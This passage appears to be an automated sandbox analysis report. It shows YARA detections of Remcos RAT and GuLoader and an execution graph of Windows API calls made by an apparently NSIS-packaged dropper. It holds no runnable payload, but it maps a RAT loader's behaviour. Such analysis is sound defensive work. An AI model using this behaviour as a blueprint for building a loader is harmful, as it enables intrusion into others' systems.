                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2983718490.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2983718490.00000000016FC000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:15.9%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:15.9%
                                                                            Total number of Nodes:1608
                                                                            Total number of Limit Nodes:35
                                                                            execution_graph 5221 4047c0 5222 4047d8 5221->5222 5226 4048f2 5221->5226 5252 404601 5222->5252 5223 40495c 5224 404a26 5223->5224 5225 404966 GetDlgItem 5223->5225 5264 404668 5224->5264 5228 404980 5225->5228 5229 4049e7 5225->5229 5226->5223 5226->5224 5230 40492d GetDlgItem SendMessageW 5226->5230 5228->5229 5236 4049a6 SendMessageW LoadCursorW SetCursor 5228->5236 5229->5224 5237 4049f9 5229->5237 5257 404623 EnableWindow 5230->5257 5231 40483f 5234 404601 22 API calls 5231->5234 5241 40484c CheckDlgButton 5234->5241 5235 404a21 5261 404a6f 5236->5261 5238 404a0f 5237->5238 5239 4049ff SendMessageW 5237->5239 5238->5235 5243 404a15 SendMessageW 5238->5243 5239->5238 5240 404957 5258 404a4b 5240->5258 5255 404623 EnableWindow 5241->5255 5243->5235 5247 40486a GetDlgItem 5256 404636 SendMessageW 5247->5256 5249 404880 SendMessageW 5250 4048a6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5249->5250 5251 40489d GetSysColor 5249->5251 5250->5235 5251->5250 5253 4066bf 21 API calls 5252->5253 5254 40460c SetDlgItemTextW 5253->5254 5254->5231 5255->5247 5256->5249 5257->5240 5259 404a59 5258->5259 5260 404a5e SendMessageW 5258->5260 5259->5260 5260->5223 5278 405ca8 ShellExecuteExW 5261->5278 5263 4049d5 LoadCursorW SetCursor 5263->5229 5265 40472b 5264->5265 5266 404680 GetWindowLongW 5264->5266 5265->5235 5266->5265 5267 404695 5266->5267 5267->5265 5268 4046c2 GetSysColor 5267->5268 5269 4046c5 5267->5269 5268->5269 5270 4046d5 SetBkMode 5269->5270 5271 4046cb SetTextColor 5269->5271 5272 4046f3 5270->5272 5273 4046ed GetSysColor 5270->5273 5271->5270 5274 404704 5272->5274 5275 4046fa SetBkColor 5272->5275 5273->5272 5274->5265 5276 404717 DeleteObject 5274->5276 5277 40471e CreateBrushIndirect 5274->5277 5275->5274 5276->5277 5277->5265 5278->5263 5279 402643 5280 402672 5279->5280 5281 402657 5279->5281 5283 4026a2 5280->5283 5284 402677 5280->5284 5282 402d89 21 API calls 5281->5282 5292 40265e 5282->5292 5286 402dab 21 API calls 5283->5286 5285 402dab 21 API calls 5284->5285 5288 40267e 5285->5288 5287 4026a9 lstrlenW 5286->5287 5287->5292 5296 4066a4 WideCharToMultiByte 5288->5296 5290 402692 lstrlenA 5290->5292 5291 4026ec 5292->5291 5294 406253 5 API calls 5292->5294 5295 4026d6 5292->5295 5293 406224 WriteFile 5293->5291 5294->5295 5295->5291 5295->5293 5296->5290 4353 403645 SetErrorMode GetVersionExW 4354 4036d1 4353->4354 4355 403699 GetVersionExW 4353->4355 4356 403728 4354->4356 4357 406a76 5 API calls 4354->4357 4355->4354 4358 406a06 3 API calls 4356->4358 4357->4356 4359 40373e lstrlenA 4358->4359 4359->4356 4360 40374e 4359->4360 4361 406a76 5 API calls 4360->4361 4362 403755 4361->4362 4363 406a76 5 API calls 4362->4363 4364 40375c 4363->4364 4365 406a76 5 API calls 4364->4365 4366 403768 #17 OleInitialize SHGetFileInfoW 4365->4366 4441 406682 lstrcpynW 4366->4441 4369 4037b7 GetCommandLineW 4442 406682 lstrcpynW 4369->4442 4371 4037c9 4372 405f7e CharNextW 4371->4372 4373 4037ef CharNextW 4372->4373 4383 403801 4373->4383 4374 403903 4375 403917 GetTempPathW 4374->4375 4443 403614 4375->4443 4377 40392f 4379 403933 GetWindowsDirectoryW lstrcatW 4377->4379 4380 403989 DeleteFileW 4377->4380 4378 405f7e CharNextW 4378->4383 4381 403614 12 API calls 4379->4381 4453 4030d5 GetTickCount GetModuleFileNameW 4380->4453 4384 40394f 4381->4384 4383->4374 4383->4378 4387 403905 4383->4387 4384->4380 4386 403953 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4384->4386 4385 40399d 4393 405f7e CharNextW 4385->4393 4424 403a44 4385->4424 4432 403a54 4385->4432 4388 403614 12 API calls 4386->4388 4540 406682 lstrcpynW 4387->4540 4391 403981 4388->4391 4391->4380 4391->4432 4397 4039bc 4393->4397 4395 403ba2 4398 405ce2 MessageBoxIndirectW 4395->4398 4396 403bc6 4399 403c4a ExitProcess 4396->4399 4400 403bce GetCurrentProcess OpenProcessToken 4396->4400 4401 403a1a 4397->4401 4402 403a5d 4397->4402 4404 403bb0 ExitProcess 4398->4404 4405 403be6 LookupPrivilegeValueW AdjustTokenPrivileges 4400->4405 4406 403c1a 4400->4406 4541 406059 4401->4541 4557 405c4d 4402->4557 4405->4406 4407 406a76 5 API calls 4406->4407 4410 403c21 4407->4410 4414 403c36 ExitWindowsEx 4410->4414 4416 403c43 4410->4416 4414->4399 4414->4416 4415 403a7c 4418 403a94 4415->4418 4561 406682 lstrcpynW 4415->4561 4626 40140b 4416->4626 4423 403aba wsprintfW 4418->4423 4438 403ae6 4418->4438 4420 403a39 4556 406682 lstrcpynW 4420->4556 4425 4066bf 21 API calls 4423->4425 4483 403d54 4424->4483 4425->4418 4428 403b30 SetCurrentDirectoryW 4607 406442 MoveFileExW 4428->4607 4429 403af6 GetFileAttributesW 4430 403b02 DeleteFileW 4429->4430 4429->4438 4430->4438 4617 403c62 4432->4617 4435 406442 40 API calls 4435->4438 4436 4066bf 21 API calls 4436->4438 4438->4418 4438->4423 4438->4428 4438->4429 4438->4432 4438->4435 4438->4436 4439 403bb8 CloseHandle 4438->4439 4562 405bd6 CreateDirectoryW 4438->4562 4565 405c30 CreateDirectoryW 4438->4565 4568 405d8e 4438->4568 4611 405c65 CreateProcessW 4438->4611 4614 4069df FindFirstFileW 4438->4614 4439->4432 4441->4369 4442->4371 4444 406930 5 API calls 4443->4444 4446 403620 4444->4446 4445 40362a 4445->4377 4446->4445 4629 405f51 lstrlenW CharPrevW 4446->4629 4449 405c30 2 API calls 4450 403638 4449->4450 4451 4061a1 2 API calls 4450->4451 4452 403643 4451->4452 4452->4377 4632 406172 GetFileAttributesW CreateFileW 4453->4632 4455 403118 4482 403125 4455->4482 4633 406682 lstrcpynW 4455->4633 4457 40313b 4634 405f9d lstrlenW 4457->4634 4461 40314c GetFileSize 4462 403163 4461->4462 4477 403246 4461->4477 4469 4032e3 4462->4469 4476 403033 36 API calls 4462->4476 4462->4477 4462->4482 4670 4035e7 4462->4670 4466 40328b GlobalAlloc 4467 4032a2 4466->4467 4472 4061a1 2 API calls 4467->4472 4470 403033 36 API calls 4469->4470 4470->4482 4471 40326c 4473 4035e7 ReadFile 4471->4473 4474 4032b3 CreateFileW 4472->4474 4475 403277 4473->4475 4478 4032ed 4474->4478 4474->4482 4475->4466 4475->4482 4476->4462 4639 403033 4477->4639 4654 4035fd SetFilePointer 4478->4654 4480 4032fb 4655 403376 4480->4655 4482->4385 4482->4482 4484 406a76 5 API calls 4483->4484 4485 403d68 4484->4485 4486 403d80 4485->4486 4487 403d6e 4485->4487 4488 406550 3 API calls 4486->4488 4725 4065c9 wsprintfW 4487->4725 4489 403db0 4488->4489 4491 403dcf lstrcatW 4489->4491 4493 406550 3 API calls 4489->4493 4492 403d7e 4491->4492 4717 40402a 4492->4717 4493->4491 4496 406059 18 API calls 4497 403e01 4496->4497 4498 403e95 4497->4498 4500 406550 3 API calls 4497->4500 4499 406059 18 API calls 4498->4499 4501 403e9b 4499->4501 4502 403e33 4500->4502 4503 403eab LoadImageW 4501->4503 4504 4066bf 21 API calls 4501->4504 4502->4498 4507 403e54 lstrlenW 4502->4507 4511 405f7e CharNextW 4502->4511 4505 403f51 4503->4505 4506 403ed2 RegisterClassW 4503->4506 4504->4503 4510 40140b 2 API calls 4505->4510 4508 403f5b 4506->4508 4509 403f08 SystemParametersInfoW CreateWindowExW 4506->4509 4512 403e62 lstrcmpiW 4507->4512 4513 403e88 4507->4513 4508->4432 4509->4505 4514 403f57 4510->4514 4516 403e51 4511->4516 4512->4513 4517 403e72 GetFileAttributesW 4512->4517 4515 405f51 3 API calls 4513->4515 4514->4508 4518 40402a 22 API calls 4514->4518 4519 403e8e 4515->4519 4516->4507 4520 403e7e 4517->4520 4521 403f68 4518->4521 4726 406682 lstrcpynW 4519->4726 4520->4513 4523 405f9d 2 API calls 4520->4523 4524 403f74 ShowWindow 4521->4524 4525 403ff7 4521->4525 4523->4513 4527 406a06 3 API calls 4524->4527 4727 4057da OleInitialize 4525->4727 4529 403f8c 4527->4529 4528 403ffd 4530 404001 4528->4530 4531 404019 4528->4531 4532 403f9a GetClassInfoW 4529->4532 4534 406a06 3 API calls 4529->4534 4530->4508 4537 40140b 2 API calls 4530->4537 4533 40140b 2 API calls 4531->4533 4535 403fc4 DialogBoxParamW 4532->4535 4536 403fae GetClassInfoW RegisterClassW 4532->4536 4533->4508 4534->4532 4538 40140b 2 API calls 4535->4538 4536->4535 4537->4508 4539 403fec 4538->4539 4539->4508 4540->4375 4745 406682 lstrcpynW 4541->4745 4543 40606a 4746 405ffc CharNextW CharNextW 4543->4746 4546 403a26 4546->4432 4555 406682 lstrcpynW 4546->4555 4547 406930 5 API calls 4553 406080 4547->4553 4548 4060b1 lstrlenW 4549 4060bc 4548->4549 4548->4553 4550 405f51 3 API calls 4549->4550 4552 4060c1 GetFileAttributesW 4550->4552 4551 4069df 2 API calls 4551->4553 4552->4546 4553->4546 4553->4548 4553->4551 4554 405f9d 2 API calls 4553->4554 4554->4548 4555->4420 4556->4424 4558 406a76 5 API calls 4557->4558 4559 403a62 lstrlenW 4558->4559 4560 406682 lstrcpynW 4559->4560 4560->4415 4561->4418 4563 405c22 4562->4563 4564 405c26 GetLastError 4562->4564 4563->4438 4564->4563 4566 405c40 4565->4566 4567 405c44 GetLastError 4565->4567 4566->4438 4567->4566 4569 406059 18 API calls 4568->4569 4570 405dae 4569->4570 4571 405db6 DeleteFileW 4570->4571 4572 405dcd 4570->4572 4573 405f04 4571->4573 4574 405ef8 4572->4574 4752 406682 lstrcpynW 4572->4752 4573->4438 4574->4573 4580 4069df 2 API calls 4574->4580 4576 405df3 4577 405e06 4576->4577 4578 405df9 lstrcatW 4576->4578 4579 405f9d 2 API calls 4577->4579 4581 405e0c 4578->4581 4579->4581 4583 405f12 4580->4583 4582 405e1c lstrcatW 4581->4582 4584 405e27 lstrlenW FindFirstFileW 4581->4584 4582->4584 4583->4573 4585 405f16 4583->4585 4586 405eed 4584->4586 4605 405e49 4584->4605 4587 405f51 3 API calls 4585->4587 4586->4574 4588 405f1c 4587->4588 4589 405d46 5 API calls 4588->4589 4592 405f28 4589->4592 4591 405ed0 FindNextFileW 4593 405ee6 FindClose 4591->4593 4591->4605 4594 405f42 4592->4594 4595 405f2c 4592->4595 4593->4586 4597 405707 28 API calls 4594->4597 4595->4573 4598 405707 28 API calls 4595->4598 4597->4573 4600 405f39 4598->4600 4599 405d8e 64 API calls 4599->4605 4602 406442 40 API calls 4600->4602 4601 405707 28 API calls 4601->4591 4603 405f40 4602->4603 4603->4573 4604 405707 28 API calls 4604->4605 4605->4591 4605->4599 4605->4601 4605->4604 4606 406442 40 API calls 4605->4606 4753 406682 lstrcpynW 4605->4753 4754 405d46 4605->4754 4606->4605 4608 403b3f CopyFileW 4607->4608 4609 406456 4607->4609 4608->4432 4608->4438 4765 4062c8 4609->4765 4612 405ca4 4611->4612 4613 405c98 CloseHandle 4611->4613 4612->4438 4613->4612 4615 406a00 4614->4615 4616 4069f5 FindClose 4614->4616 4615->4438 4616->4615 4618 403c73 CloseHandle 4617->4618 4619 403c7d 4617->4619 4618->4619 4620 403c91 4619->4620 4621 403c87 CloseHandle 4619->4621 4799 403cbf 4620->4799 4621->4620 4624 405d8e 71 API calls 4625 403b95 OleUninitialize 4624->4625 4625->4395 4625->4396 4627 401389 2 API calls 4626->4627 4628 401420 4627->4628 4628->4399 4630 403632 4629->4630 4631 405f6d lstrcatW 4629->4631 4630->4449 4631->4630 4632->4455 4633->4457 4635 405fab 4634->4635 4636 405fb1 CharPrevW 4635->4636 4637 403141 4635->4637 4636->4635 4636->4637 4638 406682 lstrcpynW 4637->4638 4638->4461 4640 403044 4639->4640 4641 40305c 4639->4641 4642 403054 4640->4642 4643 40304d DestroyWindow 4640->4643 4644 403064 4641->4644 4645 40306c GetTickCount 4641->4645 4642->4466 4642->4482 4673 4035fd SetFilePointer 4642->4673 4643->4642 4674 406ab2 4644->4674 4645->4642 4647 40307a 4645->4647 4648 403082 4647->4648 4649 4030af CreateDialogParamW ShowWindow 4647->4649 4648->4642 4678 403017 4648->4678 4649->4642 4651 403090 wsprintfW 4681 405707 4651->4681 4654->4480 4656 4033a1 4655->4656 4657 403385 SetFilePointer 4655->4657 4692 40347e GetTickCount 4656->4692 4657->4656 4660 40343e 4660->4482 4663 40347e 46 API calls 4664 4033d8 4663->4664 4664->4660 4665 403444 ReadFile 4664->4665 4667 4033e7 4664->4667 4665->4660 4667->4660 4668 4061f5 ReadFile 4667->4668 4707 406224 WriteFile 4667->4707 4668->4667 4671 4061f5 ReadFile 4670->4671 4672 4035fa 4671->4672 4672->4462 4673->4471 4675 406acf PeekMessageW 4674->4675 4676 406ac5 DispatchMessageW 4675->4676 4677 406adf 4675->4677 4676->4675 4677->4642 4679 403026 4678->4679 4680 403028 MulDiv 4678->4680 4679->4680 4680->4651 4682 405722 4681->4682 4691 4030ad 4681->4691 4683 40573e lstrlenW 4682->4683 4684 4066bf 21 API calls 4682->4684 4685 405767 4683->4685 4686 40574c lstrlenW 4683->4686 4684->4683 4688 40577a 4685->4688 4689 40576d SetWindowTextW 4685->4689 4687 40575e lstrcatW 4686->4687 4686->4691 4687->4685 4690 405780 SendMessageW SendMessageW SendMessageW 4688->4690 4688->4691 4689->4688 4690->4691 4691->4642 4693 4035d6 4692->4693 4694 4034ac 4692->4694 4695 403033 36 API calls 4693->4695 4709 4035fd SetFilePointer 4694->4709 4701 4033a8 4695->4701 4697 4034b7 SetFilePointer 4703 4034dc 4697->4703 4698 4035e7 ReadFile 4698->4703 4700 403033 36 API calls 4700->4703 4701->4660 4705 4061f5 ReadFile 4701->4705 4702 406224 WriteFile 4702->4703 4703->4698 4703->4700 4703->4701 4703->4702 4704 4035b7 SetFilePointer 4703->4704 4710 406bf1 4703->4710 4704->4693 4706 4033c1 4705->4706 4706->4660 4706->4663 4708 406242 4707->4708 4708->4667 4709->4697 4711 406c16 4710->4711 4714 406c1e 4710->4714 4711->4703 4712 406ca5 GlobalFree 4713 406cae GlobalAlloc 4712->4713 4713->4711 4713->4714 4714->4711 4714->4712 4714->4713 4715 406d25 GlobalAlloc 4714->4715 4716 406d1c GlobalFree 4714->4716 4715->4711 4715->4714 4716->4715 4718 40403e 4717->4718 4734 4065c9 wsprintfW 4718->4734 4720 4040af 4735 4040e3 4720->4735 4722 403ddf 4722->4496 4723 4040b4 4723->4722 4724 4066bf 21 API calls 4723->4724 4724->4723 4725->4492 4726->4498 4738 40464d 4727->4738 4729 405824 4730 40464d SendMessageW 4729->4730 4732 405836 OleUninitialize 4730->4732 4731 4057fd 4731->4729 4741 401389 4731->4741 4732->4528 4734->4720 4736 4066bf 21 API calls 4735->4736 4737 4040f1 SetWindowTextW 4736->4737 4737->4723 4739 404665 4738->4739 4740 404656 SendMessageW 4738->4740 4739->4731 4740->4739 4742 401390 4741->4742 4743 4013fe 4742->4743 4744 4013cb MulDiv SendMessageW 4742->4744 4743->4731 4744->4742 4745->4543 4747 406019 4746->4747 4749 40602b 4746->4749 4747->4749 4750 406026 CharNextW 4747->4750 4748 40604f 4748->4546 4748->4547 4749->4748 4751 405f7e CharNextW 4749->4751 4750->4748 4751->4749 4752->4576 4753->4605 4762 40614d GetFileAttributesW 4754->4762 4757 405d73 4757->4605 4758 405d61 RemoveDirectoryW 4760 405d6f 4758->4760 4759 405d69 DeleteFileW 4759->4760 4760->4757 4761 405d7f SetFileAttributesW 4760->4761 4761->4757 4763 405d52 4762->4763 4764 40615f SetFileAttributesW 4762->4764 4763->4757 4763->4758 4763->4759 4764->4763 4766 4062f8 4765->4766 4767 40631e GetShortPathNameW 4765->4767 4792 406172 GetFileAttributesW CreateFileW 4766->4792 4769 406333 4767->4769 4770 40643d 4767->4770 4769->4770 4772 40633b wsprintfA 4769->4772 4770->4608 4771 406302 CloseHandle GetShortPathNameW 4771->4770 4773 406316 4771->4773 4774 4066bf 21 API calls 4772->4774 4773->4767 4773->4770 4775 406363 4774->4775 4793 406172 GetFileAttributesW CreateFileW 4775->4793 4777 406370 4777->4770 4778 40637f GetFileSize GlobalAlloc 4777->4778 4779 4063a1 4778->4779 4780 406436 CloseHandle 4778->4780 4781 4061f5 ReadFile 4779->4781 4780->4770 4782 4063a9 4781->4782 4782->4780 4794 4060d7 lstrlenA 4782->4794 4785 4063c0 lstrcpyA 4787 4063e2 4785->4787 4786 4063d4 4788 4060d7 4 API calls 4786->4788 4789 406419 SetFilePointer 4787->4789 4788->4787 4790 406224 WriteFile 4789->4790 4791 40642f GlobalFree 4790->4791 4791->4780 4792->4771 4793->4777 4795 406118 lstrlenA 4794->4795 4796 406120 4795->4796 4797 4060f1 lstrcmpiA 4795->4797 4796->4785 4796->4786 4797->4796 4798 40610f CharNextA 4797->4798 4798->4795 4800 403ccd 4799->4800 4801 403c96 4800->4801 4802 403cd2 FreeLibrary GlobalFree 4800->4802 4801->4624 4802->4801 4802->4802 4809 4015c6 4810 402dab 21 API calls 4809->4810 4811 4015cd 4810->4811 4812 405ffc 4 API calls 4811->4812 4824 4015d6 4812->4824 4813 401636 4815 401668 4813->4815 4816 40163b 4813->4816 4814 405f7e CharNextW 4814->4824 4818 401423 28 API calls 4815->4818 4828 401423 4816->4828 4825 401660 4818->4825 4821 405c30 2 API calls 4821->4824 4822 405c4d 5 API calls 4822->4824 4823 40164f SetCurrentDirectoryW 4823->4825 4824->4813 4824->4814 4824->4821 4824->4822 4826 40161c GetFileAttributesW 4824->4826 4827 405bd6 2 API calls 4824->4827 4826->4824 4827->4824 4829 405707 28 API calls 4828->4829 4830 401431 4829->4830 4831 406682 lstrcpynW 4830->4831 4831->4823 5297 405846 5298 4059f0 5297->5298 5299 405867 GetDlgItem GetDlgItem GetDlgItem 5297->5299 5301 405a21 5298->5301 5302 4059f9 GetDlgItem CreateThread CloseHandle 5298->5302 5342 404636 SendMessageW 5299->5342 5304 405a71 5301->5304 5305 405a38 ShowWindow ShowWindow 5301->5305 5306 405a4c 5301->5306 5302->5301 5303 4058d7 5308 4058de GetClientRect GetSystemMetrics SendMessageW SendMessageW 5303->5308 5312 404668 8 API calls 5304->5312 5344 404636 SendMessageW 5305->5344 5307 405aac 5306->5307 5310 405a60 5306->5310 5311 405a86 ShowWindow 5306->5311 5307->5304 5315 405aba SendMessageW 5307->5315 5313 405930 SendMessageW SendMessageW 5308->5313 5314 40594c 5308->5314 5345 4045da 5310->5345 5318 405aa6 5311->5318 5319 405a98 5311->5319 5317 405a7f 5312->5317 5313->5314 5320 405951 SendMessageW 5314->5320 5321 40595f 5314->5321 5315->5317 5322 405ad3 CreatePopupMenu 5315->5322 5324 4045da SendMessageW 5318->5324 5323 405707 28 API calls 5319->5323 5320->5321 5326 404601 22 API calls 5321->5326 5325 4066bf 21 API calls 5322->5325 5323->5318 5324->5307 5327 405ae3 AppendMenuW 5325->5327 5328 40596f 5326->5328 5329 405b00 GetWindowRect 5327->5329 5330 405b13 TrackPopupMenu 5327->5330 5331 405978 ShowWindow 5328->5331 5332 4059ac GetDlgItem SendMessageW 5328->5332 5329->5330 5330->5317 5333 405b2e 5330->5333 5334 40599b 5331->5334 5335 40598e ShowWindow 5331->5335 5332->5317 5336 4059d3 SendMessageW SendMessageW 5332->5336 5337 405b4a SendMessageW 5333->5337 5343 404636 SendMessageW 5334->5343 5335->5334 5336->5317 5337->5337 5338 405b67 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5337->5338 5340 405b8c SendMessageW 5338->5340 5340->5340 5341 405bb5 GlobalUnlock SetClipboardData CloseClipboard 5340->5341 5341->5317 5342->5303 5343->5332 5344->5306 5346 4045e1 5345->5346 5347 4045e7 SendMessageW 5345->5347 5346->5347 5347->5304 5348 733b103d 5351 733b101b 5348->5351 5358 733b15b6 5351->5358 5353 733b1020 5354 733b1027 GlobalAlloc 5353->5354 5355 733b1024 5353->5355 5354->5355 5356 733b15dd 3 API calls 5355->5356 5357 733b103b 5356->5357 5359 733b15bc 5358->5359 5360 733b15c2 5359->5360 5361 733b15ce GlobalFree 5359->5361 5360->5353 5361->5353 4832 401c48 4833 402d89 21 API calls 4832->4833 4834 401c4f 4833->4834 4835 402d89 21 API calls 4834->4835 4836 401c5c 4835->4836 4837 401c71 4836->4837 4838 402dab 21 API calls 4836->4838 4839 401c81 4837->4839 4840 402dab 21 API calls 4837->4840 4838->4837 4841 401cd8 4839->4841 4842 401c8c 4839->4842 4840->4839 4843 402dab 21 API calls 4841->4843 4844 402d89 21 API calls 4842->4844 4845 401cdd 4843->4845 4846 401c91 4844->4846 4847 402dab 21 API calls 4845->4847 4848 402d89 21 API calls 4846->4848 4849 401ce6 FindWindowExW 4847->4849 4850 401c9d 4848->4850 4853 401d08 4849->4853 4851 401cc8 SendMessageW 4850->4851 4852 401caa SendMessageTimeoutW 4850->4852 4851->4853 4852->4853 5362 404e48 5363 404e74 5362->5363 5364 404e58 5362->5364 5365 404ea7 5363->5365 5366 404e7a SHGetPathFromIDListW 5363->5366 5373 405cc6 GetDlgItemTextW 5364->5373 5369 404e91 SendMessageW 5366->5369 5370 404e8a 5366->5370 5368 404e65 SendMessageW 5368->5363 5369->5365 5371 40140b 2 API calls 5370->5371 5371->5369 5373->5368 5374 4028c9 5375 4028cf 5374->5375 5376 4028d7 FindClose 5375->5376 5377 402c2f 5375->5377 5376->5377 5381 4016d1 5382 402dab 21 API calls 5381->5382 5383 4016d7 GetFullPathNameW 5382->5383 5384 4016f1 5383->5384 5390 401713 5383->5390 5386 4069df 2 API calls 5384->5386 5384->5390 5385 401728 GetShortPathNameW 5387 402c2f 5385->5387 5388 401703 5386->5388 5388->5390 5391 406682 lstrcpynW 5388->5391 5390->5385 5390->5387 5391->5390 5392 401e53 GetDC 5393 402d89 21 API calls 5392->5393 5394 401e65 GetDeviceCaps MulDiv ReleaseDC 5393->5394 5395 402d89 21 API calls 5394->5395 5396 401e96 5395->5396 5397 4066bf 21 API calls 5396->5397 5398 401ed3 CreateFontIndirectW 5397->5398 5399 40263d 5398->5399 5400 402955 5401 402dab 21 API calls 5400->5401 5402 402961 5401->5402 5403 402977 5402->5403 5404 402dab 21 API calls 5402->5404 5405 40614d 2 API calls 5403->5405 5404->5403 5406 40297d 5405->5406 5428 406172 GetFileAttributesW CreateFileW 5406->5428 5408 40298a 5409 402a40 5408->5409 5410 4029a5 GlobalAlloc 5408->5410 5411 402a28 5408->5411 5412 402a47 DeleteFileW 5409->5412 5413 402a5a 5409->5413 5410->5411 5414 4029be 5410->5414 5415 403376 48 API calls 5411->5415 5412->5413 5429 4035fd SetFilePointer 5414->5429 5417 402a35 CloseHandle 5415->5417 5417->5409 5418 4029c4 5419 4035e7 ReadFile 5418->5419 5420 4029cd GlobalAlloc 5419->5420 5421 402a11 5420->5421 5422 4029dd 5420->5422 5423 406224 WriteFile 5421->5423 5424 403376 48 API calls 5422->5424 5425 402a1d GlobalFree 5423->5425 5427 4029ea 5424->5427 5425->5411 5426 402a08 GlobalFree 5426->5421 5427->5426 5428->5408 5429->5418 5444 4014d7 5445 402d89 21 API calls 5444->5445 5446 4014dd Sleep 5445->5446 5448 402c2f 5446->5448 5449 40195b 5450 402dab 21 API calls 5449->5450 5451 401962 lstrlenW 5450->5451 5452 40263d 5451->5452 5027 4020dd 5028 4021a1 5027->5028 5029 4020ef 5027->5029 5031 401423 28 API calls 5028->5031 5030 402dab 21 API calls 5029->5030 5032 4020f6 5030->5032 5037 4022fb 5031->5037 5033 402dab 21 API calls 5032->5033 5034 4020ff 5033->5034 5035 402115 LoadLibraryExW 5034->5035 5036 402107 GetModuleHandleW 5034->5036 5035->5028 5038 402126 5035->5038 5036->5035 5036->5038 5050 406ae5 5038->5050 5041 402170 5043 405707 28 API calls 5041->5043 5042 402137 5044 402156 5042->5044 5045 40213f 5042->5045 5046 402147 5043->5046 5055 733b1817 5044->5055 5047 401423 28 API calls 5045->5047 5046->5037 5048 402193 FreeLibrary 5046->5048 5047->5046 5048->5037 5097 4066a4 WideCharToMultiByte 5050->5097 5052 406b02 5053 406b09 GetProcAddress 5052->5053 5054 402131 5052->5054 5053->5054 5054->5041 5054->5042 5056 733b184a 5055->5056 5098 733b1bff 5056->5098 5058 733b1851 5059 733b1976 5058->5059 5060 733b1869 5058->5060 5061 733b1862 5058->5061 5059->5046 5132 733b2480 5060->5132 5148 733b243e 5061->5148 5066 733b18af 5161 733b2655 5066->5161 5067 733b18cd 5070 733b191e 5067->5070 5071 733b18d3 5067->5071 5068 733b1898 5081 733b188e 5068->5081 5158 733b2e23 5068->5158 5069 733b187f 5073 733b1885 5069->5073 5074 733b1890 5069->5074 5078 733b2655 10 API calls 5070->5078 5180 733b1666 5071->5180 5073->5081 5142 733b2b98 5073->5142 5152 733b2810 5074->5152 5084 733b190f 5078->5084 5079 733b18b5 5172 733b1654 5079->5172 5081->5066 5081->5067 5089 733b1965 5084->5089 5186 733b2618 5084->5186 5086 733b1896 5086->5081 5087 733b2655 10 API calls 5087->5084 5089->5059 5091 733b196f GlobalFree 5089->5091 5091->5059 5094 733b1951 5094->5089 5190 733b15dd wsprintfW 5094->5190 5095 733b194a FreeLibrary 5095->5094 5097->5052 5193 733b12bb GlobalAlloc 5098->5193 5100 733b1c26 5194 733b12bb GlobalAlloc 5100->5194 5102 733b1e6b GlobalFree GlobalFree GlobalFree 5103 733b1e88 5102->5103 5114 733b1ed2 5102->5114 5104 733b227e 5103->5104 5112 733b1e9d 5103->5112 5103->5114 5106 733b22a0 GetModuleHandleW 5104->5106 5104->5114 5105 733b1d26 GlobalAlloc 5124 733b1c31 5105->5124 5109 733b22b1 LoadLibraryW 5106->5109 5110 733b22c6 5106->5110 5107 733b1d71 lstrcpyW 5111 733b1d7b lstrcpyW 5107->5111 5108 733b1d8f GlobalFree 5108->5124 5109->5110 5109->5114 5201 733b16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5110->5201 5111->5124 5112->5114 5197 733b12cc 5112->5197 5114->5058 5115 733b2318 5115->5114 5119 733b2325 lstrlenW 5115->5119 5116 733b2126 5200 733b12bb GlobalAlloc 5116->5200 5202 733b16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5119->5202 5120 733b2067 GlobalFree 5120->5124 5121 733b21ae 5121->5114 5129 733b2216 lstrcpyW 5121->5129 5122 733b22d8 5122->5115 5130 733b2302 GetProcAddress 5122->5130 5124->5102 5124->5105 5124->5107 5124->5108 5124->5111 5124->5114 5124->5116 5124->5120 5124->5121 5125 733b12cc 2 API calls 5124->5125 5126 733b1dcd 5124->5126 5125->5124 5126->5124 5195 733b162f GlobalSize GlobalAlloc 5126->5195 5127 733b233f 5127->5114 5129->5114 5130->5115 5131 733b212f 5131->5058 5139 733b2498 5132->5139 5133 733b12cc GlobalAlloc lstrcpynW 5133->5139 5135 733b25c1 GlobalFree 5138 733b186f 5135->5138 5135->5139 5136 733b256b GlobalAlloc 5140 733b2582 5136->5140 5137 733b2540 GlobalAlloc WideCharToMultiByte 5137->5135 5138->5068 5138->5069 5138->5081 5139->5133 5139->5135 5139->5136 5139->5137 5139->5140 5204 733b135a 5139->5204 5140->5135 5208 733b27a4 5140->5208 5143 733b2baa 5142->5143 5144 733b2c4f CloseHandle 5143->5144 5147 733b2c6d 5144->5147 5146 733b2d39 5146->5081 5211 733b2b42 5147->5211 5149 733b2453 5148->5149 5150 733b245e GlobalAlloc 5149->5150 5151 733b1868 5149->5151 5150->5149 5151->5060 5156 733b2840 5152->5156 5153 733b28db GlobalAlloc 5157 733b28fe 5153->5157 5154 733b28ee 5155 733b28f4 GlobalSize 5154->5155 5154->5157 5155->5157 5156->5153 5156->5154 5157->5086 5160 733b2e2e 5158->5160 5159 733b2e6e GlobalFree 5160->5159 5215 733b12bb GlobalAlloc 5161->5215 5163 733b270b lstrcpynW 5169 733b265f 5163->5169 5164 733b26fa StringFromGUID2 5164->5169 5165 733b26d8 MultiByteToWideChar 5165->5169 5166 733b271e wsprintfW 5166->5169 5167 733b2742 GlobalFree 5167->5169 5168 733b2777 GlobalFree 5168->5079 5169->5163 5169->5164 5169->5165 5169->5166 5169->5167 5169->5168 5170 733b1312 2 API calls 5169->5170 5216 733b1381 5169->5216 5170->5169 5220 733b12bb GlobalAlloc 5172->5220 5174 733b1659 5175 733b1666 2 API calls 5174->5175 5176 733b1663 5175->5176 5177 733b1312 5176->5177 5178 733b131b GlobalAlloc lstrcpynW 5177->5178 5179 733b1355 GlobalFree 5177->5179 5178->5179 